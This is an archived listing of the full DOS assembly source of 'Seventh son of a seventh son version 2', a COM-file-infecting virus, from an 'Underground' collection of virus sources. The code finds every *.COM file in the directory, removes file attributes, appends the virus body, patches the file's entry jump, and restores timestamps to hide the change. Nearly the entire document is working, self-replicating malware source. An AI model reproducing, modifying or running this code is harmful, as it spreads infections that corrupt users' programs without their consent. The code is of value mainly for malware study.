home *** CD-ROM | disk | FTP | other *** search
/ Underground / Underground CD1.iso / virii / zrodla / 0-9 / 7son2.asm < prev    next >
Encoding:
Assembly Source File  |  1998-01-14  |  7.7 KB  |  232 lines
  1. ;****************************************************************************
  2. ;*              Seventh son of a seventh son    version 2
  3. ;****************************************************************************
  4.  
  5. cseg            segment
  6.                 assume  cs:cseg,ds:cseg,es:cseg,ss:cseg
  7.  
  8. FILELEN         equ     end - start
  9. MINTARGET       equ     1000
  10. MAXTARGET       equ     -(FILELEN+40h)
  11.  
  12.                 org     100h
  13.  
  14.                 .RADIX  16
  15.  
  16.  
  17. ;****************************************************************************
  18. ;*              Dummy program (infected)
  19. ;****************************************************************************
  20.  
  21. begin:          db      4Dh
  22.                 jmp     start
  23.  
  24.  
  25. ;****************************************************************************
  26. ;*              Begin of the virus
  27. ;****************************************************************************
  28.  
  29. start:          call    start2
  30. start2:         pop     bp
  31.                 sub     bp,0103h
  32.  
  33.                 lea     si,[bp+offset begbuf-4] ;restore begin of file
  34.                 mov     di,0100h
  35.                 movsw
  36.                 movsw
  37.  
  38.                 mov     ax,3300h                ;get ctrl-break flag
  39.                 int     21
  40.                 push    dx
  41.  
  42.                 xor     dl,dl                   ;clear the flag
  43.                 mov     ax,3301h
  44.                 int     21
  45.  
  46.                 mov     ax,3524h                ;get int24 vector
  47.                 int     21
  48.                 push    bx
  49.                 push    es
  50.  
  51.                 mov     dx,offset ni24 - 4      ;set new int24 vector
  52.                 add     dx,bp
  53.                 mov     ax,2524h
  54.                 int     21
  55.  
  56.                 lea     dx,[bp+offset end]      ;set new DTA adres
  57.                 mov     ah,1Ah
  58.                 int     21
  59.                 add     dx,1Eh
  60.                 mov     word ptr [bp+offset nameptr-4],dx
  61.  
  62.                 lea     si,[bp+offset grandfather-4]  ;check generation
  63.                 cmp     [si],0606h
  64.                 jne     verder
  65.  
  66.                 lea     dx,[bp+offset sontxt-4]     ;7th son of a 7th son!
  67.                 mov     ah,09h
  68.                 int     21
  69.  
  70. verder:         mov     ax,[si]                 ;update generations
  71.                 xchg    ah,al
  72.                 xor     al,al
  73.                 mov     [si],ax
  74.  
  75.                 lea     dx,[bp+offset filename-4]  ;find first COM-file
  76.                 xor     cx,cx
  77.                 mov     ah,4Eh
  78.                 int     21
  79.  
  80. infloop:        mov     dx,word ptr [bp+offset nameptr-4]
  81.                 call    infect
  82.  
  83.                 mov     ah,4Fh                  ;find next file
  84.                 int     21
  85.                 jnc     infloop
  86.  
  87.                 pop     ds                      ;restore int24 vector
  88.                 pop     dx
  89.                 mov     ax,2524h
  90.                 int     21
  91.  
  92.                 pop     dx                      ;restore ctrl-break flag
  93.                 mov     ax,3301h
  94.                 int     21
  95.  
  96.                 push    cs
  97.                 push    cs
  98.                 pop     ds
  99.                 pop     es
  100.                 mov     ax,0100h                ;put old start-adres on stack
  101.                 push    ax
  102.  
  103.                 ret
  104.  
  105.  
  106. ;****************************************************************************
  107. ;*              Tries to infect the file (ptr to ASCIIZ-name is DS:DX)
  108. ;****************************************************************************
  109.  
  110. infect:         cld
  111.  
  112.                 mov     ax,4300h                ;ask attributes
  113.                 int     21
  114.                 push    cx
  115.  
  116.                 xor     cx,cx                   ;clear flags
  117.                 call    setattr
  118.                 jc      return1
  119.  
  120.                 mov     ax,3D02h                ;open the file
  121.                 int     21
  122.                 jc      return1
  123.                 xchg    bx,ax
  124.  
  125.                 mov     ax,5700h                ;get file date & time
  126.                 int     21
  127.                 push    cx
  128.                 push    dx
  129.  
  130.                 mov     cx,4                    ;read begin of file
  131.                 lea     dx,[bp+offset begbuf-4]
  132.                 mov     ah,3fh
  133.                 int     21
  134.  
  135.                 mov     al,byte ptr [bp+begbuf-4]  ;already infected?
  136.                 cmp     al,4Dh
  137.                 je      return2
  138.                 cmp     al,5Ah                  ;or a weird EXE?
  139.                 je      return2
  140.  
  141.                 call    endptr                  ;get file-length
  142.  
  143.                 cmp     ax,MAXTARGET            ;check length of file
  144.                 jnb     return2
  145.                 cmp     ax,MINTARGET
  146.                 jbe     return2
  147.  
  148.                 push    ax
  149.                 mov     cx,FILELEN              ;write program to end of file
  150.                 lea     dx,[bp+offset start-4]
  151.                 mov     ah,40h
  152.                 int     21
  153.                 cmp     ax,cx                   ;are all bytes written?
  154.                 pop     ax
  155.                 jnz     return2
  156.  
  157.                 sub     ax,4                    ;calculate new start-adres
  158.                 mov     word ptr [bp+newbeg-2],ax
  159.  
  160.                 call    beginptr                ;write new begin of file
  161.                 mov     cx,4
  162.                 lea     dx,[bp+offset newbeg-4]
  163.                 mov     ah,40h
  164.                 int     21
  165.  
  166.                 inc     byte ptr [si]           ;number of next son
  167.  
  168. return2:        pop     dx                      ;restore file date & time
  169.                 pop     cx
  170.                 mov     ax,5701h
  171.                 int     21
  172.  
  173.                 mov     ah,3Eh                  ;close the file
  174.                 int     21
  175.  
  176. return1:        pop     cx                      ;restore file-attribute
  177. ;                call    setattr
  178.  
  179. ;                ret
  180.  
  181.  
  182. ;****************************************************************************
  183. ;*              Changes file-attributes
  184. ;****************************************************************************
  185.  
  186. setattr:        mov     dx,word ptr [bp+offset nameptr-4]
  187.                 mov     ax,4301h
  188.                 int     21
  189.                 ret
  190.  
  191.  
  192. ;****************************************************************************
  193. ;*              Subroutines for file-pointer
  194. ;****************************************************************************
  195.  
  196. beginptr:       mov     ax,4200h                ;go to begin of file
  197.                 jmp     short ptrvrdr
  198.  
  199. endptr:         mov     ax,4202h                ;go to end of file
  200. ptrvrdr:        xor     cx,cx
  201.                 xor     dx,dx
  202.                 int     21
  203.                 ret
  204.  
  205.  
  206. ;****************************************************************************
  207. ;*              Interupt handler 24
  208. ;****************************************************************************
  209.  
  210. ni24:           mov     al,03
  211.                 iret
  212.  
  213.  
  214. ;****************************************************************************
  215. ;*              Data
  216. ;****************************************************************************
  217.  
  218. begbuf          db      0CDh,  20h, 0, 0
  219. newbeg          db       4Dh, 0E9h, 0, 0
  220. nameptr         dw      ?
  221. sontxt          db      'Seventh son of a seventh son',0Dh, 0Ah, '$'
  222. grandfather     db      0
  223. father          db      0
  224. filename        db      '*.COM',0
  225.                 db      'é¿░│▒'
  226.  
  227. end:
  228.  
  229. cseg            ends
  230.                 end     begin
  231.  
  232.